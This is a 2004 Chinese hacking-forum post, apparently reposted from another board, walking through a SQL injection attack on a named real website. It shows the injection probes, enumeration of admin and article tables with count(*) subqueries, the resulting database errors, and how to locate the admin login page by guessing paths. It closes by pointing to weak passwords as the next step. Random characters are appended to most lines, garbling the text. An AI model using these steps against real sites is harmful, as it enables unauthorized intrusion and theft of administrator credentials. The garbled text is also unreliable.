- 在线时间
- 0 小时
- 最后登录
- 2007-9-23
- 注册时间
- 2004-9-10
- 听众数
- 3
- 收听数
- 0
- 能力
- 0 分
- 体力
- 9975 点
- 威望
- 7 点
- 阅读权限
- 150
- 积分
- 4048
- 相册
- 0
- 日志
- 0
- 记录
- 0
- 帖子
- 1893
- 主题
- 823
- 精华
- 2
- 分享
- 0
- 好友
- 0
我的地盘我做主
该用户从未签到
 |
作者:枫三少 转自:黑基bbs原创作品版) Q: z; K* u# x
8 L" q4 G. A6 R' \" T$ S5 d
有很多人问过我这个问题。老是听说,看到文章里谁谁谁怎么分析别人的代码怎么来入侵的。那么怎么找代码呢?8 v( Y+ n2 r7 u* }- q
: d+ B5 g9 n8 O0 H. [0 N分析代码,首先你得有源代码。如果找源代码呢?呵呵,假如是分析DV的,就下一个DV的来,看看他的代码。
; H, c" S. `$ S& r8 ~' e3 P7 l% \' |/ b8 t
在实战中往往因为时间的愿意我们采用的还有从HTML代码入手。! J' d% i+ _- d. V
- N3 @# Z- R6 D' H2 G5 J) B这里我简单的介绍一个过程吧。
! X3 X. Y; h# }1 {9 I; D' [/ a/ y: W3 M( N: r. O
首先我找到一个网站,是我们基地首页有连接的
+ u4 G1 y1 Q, N/ v# vhttp://www.16china.com/hack/1 E& P. t+ J# S! @
1 u! m) v7 K: I; O. c: H+ O
随便选择一个分页:
3 [' a! `' u" K- Q# R/ H# Dhttp://www.16china.com/hack/SoftView.Asp?SoftID=1393 c% ~1 J- |! y+ ]* M
典型的ASP。看看能不能注射
- z, U- x( D; T: fhttp://www.16china.com/hack/SoftView.Asp?SoftID=139'
4 w1 U& _' P$ h) V5 w3 u" R返回:" h$ [! P6 B+ {
Microsoft VBScript 编译器错误 错误 '800a03f6' / A) H% e7 X8 L4 M
/ F, b [* z9 [+ p- K# G缺少 'End' 4 L4 D! W2 n5 P* f" O: l' h4 b
0 Q u G0 b! ]
/iisHelp/common/500-100.asp,行242
, B# _! w5 f; K8 A! j& u% F
. P: u/ U, v1 T! b7 e& iMicrosoft JET Database Engine 错误 '80040e14' / z: h0 `& J' o. A) i
/ a/ T0 G+ K! x
字符串的语法错误 在查询表达式 'SoftInfo.CateID=Category.CateID and SoftInfo.SubID=SubCate.SubID and SoftInfo.SoftID=139'' 中。
- a( d& |4 S' i. U4 z* Q0 y) A
/hack/SoftView.Asp,行17
% p; W2 j+ l- v$ @$ |再来:0 w0 j9 v6 f, L$ c7 O) W# ^, C
http://www.16china.com/hack/SoftView.Asp?SoftID=139%20and%201=1
t( T9 [7 `; w* o+ i2 x9 z2 o返回正常网页。
}# \" B" `" E. u
' ?8 Y W! A, e% G1 N/ Y1 n提交:% h/ P# ]% k# ]7 d6 {9 y
http://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20admin)>=03 K( T* ?4 j3 f( `* w
6 G7 `' F# Y: V. |8 b
返回正常页/+ t2 g2 [, B( U
http://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20article)>=0$ l3 l9 s/ {. i1 a
( Z' S6 `: ?2 ?; q& I. f
同样正常。
: m" Q8 A7 M; c ?- d9 |; d' }, Q: j
http://www.16china.com/hack/Soft ... )%20from%20article)>=0( H3 d& L8 k* v) m* Z) ^4 u. C
% W! d- {+ O |& Y, z- L……6 w6 n8 J8 v$ H, B# B, a2 O
% p* C! K9 e8 O* g0 c
象上面这样我们就可以成功注射网站。那么在拿到管理员帐号密码后如何找后台3 Y0 ]# y9 L1 D6 Y9 [
按以往的经验我采用:6 d' j- u" s: _! C
http://www.16china.com/hack/admin /*这里的”ADMIN“可以用LOGIN等替换*/
% w; Q5 d: h6 h! p0 Q我为什么不用http://www.16china.com/hack/admin.asp
# Y/ ^6 j& ~( Hhttp://www.16china.com/hack/admin/index.asp呢?因为我不知道他文件夹里的东西有没有被修改。如果存在ADMIN文件夹,但是并不是常用首页的话IE将返回如“你没有权限浏览网页……”等信息,一般来说我们可以确定后台就在那里。* @8 e9 B1 A" q# Z
http://www.16china.com/hack/admin返回信息:
: x( E2 a+ ~7 `! _错误提示信息!
3 @& j% ~2 E& O q: O }7 y# ~ 产生错误的可能原因:2 U' `* N" }( u2 T4 L$ x
0 b8 L! \6 u% R* T
, h4 o, M# j8 w( J; H
您没有进入本页面的权限!本次操作已被记录!: v/ {( Z9 Z' U M& \, Z
可能您还没有登陆或者不具有使用当前功能的权限!请联系管理员.1 t# F: d# c+ }- p% G4 @2 i
本页面为[管理员]专用,请先登陆后进入.% B) y5 M3 G/ T6 y0 {
0 s6 w! U2 K2 {& y( k- _返回上一页... /*说明登陆URL为常用的如:index.asp...*/
9 \$ F, C% o. H$ Z% R7 f3 z查看HTML代码:, B+ E; T. l0 \% H2 M
<html><head><title>错误提示信息!</title>3 w _/ \- X/ B" T( o& P3 v
0 F, v/ I" a& R……/ ?( P5 [/ ], A
; K& N1 J" `0 u0 d6 z1 g j
<a href=adminlogin.asp class=meun target=_top>登陆</a>后进入.5 c9 N3 N: r( b- U% z6 d- d
……% x5 T2 x$ J5 B$ `, r9 I' T% I+ `
% B5 n* k7 }# k3 f$ ?# F! W
找到了:
) o) u$ h s# k V% N2 F e6 K; Jhttp://www.16china.com/hack/admin/adminlogin.asp" p/ ? K4 i; U- X9 r
/ r$ R2 d$ }5 A& i2 x
4 [) ~ o0 S3 |/ _3 D( [2 g看看他的源代码告诉我们些什么:
) w i N. y$ s& m: G
0 W0 d8 n2 U! T. N$ L E" M<html>/ @" @) a+ p1 J! U
* L0 d. d/ t* J
<head>
- s3 I1 Z- ? L' T9 X9 r. O<title>管理员登陆</title>
: i6 v: Z( u d6 y3 M# Z4 f/ [* y9 M2 b) x
……………
, r m! ~! y' H6 J
9 l S& Q0 S6 W( M" ]- N关于数据库表名这些这里不多讲,看看,如果我们输入正确的帐号密码将回进入
& E( e' _3 s# t5 d. w; ?http://www.16china.com/hack/admin/adminlogin.asp?action=login- ~& q2 S) o4 }- W- q1 A# c
这里。
0 z* |/ k! ~+ a( y2 o0 Z9 z, U) Q7 m/ ^
只要知道了后台,我们就有很多办法,如弱口令,SQL本地执行(赢政下载系统)……
) V$ J& r8 J) r( _6 C$ b) {; y) y) q6 D, [
懂了吗?好了,时间关系加上本人技术原因就写到这里吧。不懂的可以跟贴,大家一起讨论一下:) |
zan
|
IP卡
狗仔卡
发表于 2004-10-4 00:36
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
